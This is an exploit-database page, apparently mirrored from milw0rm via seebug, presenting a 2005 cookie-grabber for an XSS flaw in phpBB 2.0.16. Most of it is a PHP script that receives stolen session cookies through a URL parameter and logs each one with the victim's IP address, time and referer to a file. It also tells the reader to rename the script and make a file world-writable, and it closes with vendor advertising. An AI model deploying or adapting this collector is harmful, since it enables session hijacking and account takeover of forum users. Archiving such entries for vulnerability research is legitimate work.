Lucene search
K

phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 28 Views

phpBB <= 2.0.16 XSS Remote Cookie Disclosur

Code

                                                // Original Author: &#39;Sjaak Rake&#39; Ref: http://www.hackthissite.org/articles/read/175/

&#60;?php
$cookie = $_GET[&#39;c&#39;];
$ip = getenv (&#39;REMOTE_ADDR&#39;);
$date=date(&#34;j F, Y, g:i a&#34;);
$referer=getenv (&#39;HTTP_REFERER&#39;);
$fp = fopen(&#39;cookies.txt&#39;, &#39;a&#39;);
fwrite($fp, &#39;Cookie: &#39;.$cookie.&#39;&#60;br&#62; IP: &#39; .$ip. &#39;&#60;br&#62; Date and Time: &#39; .$date. &#39;&#60;br&#62; Referer: &#39;.$referer.&#39;&#60;br&#62;&#60;br&#62;&#60;br&#62;&#39;);
fclose($fp);
?&#62;

//rename it to cookies.php and create one new file steal.php and chmod it to 777

# milw0rm.com [2005-07-13]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
28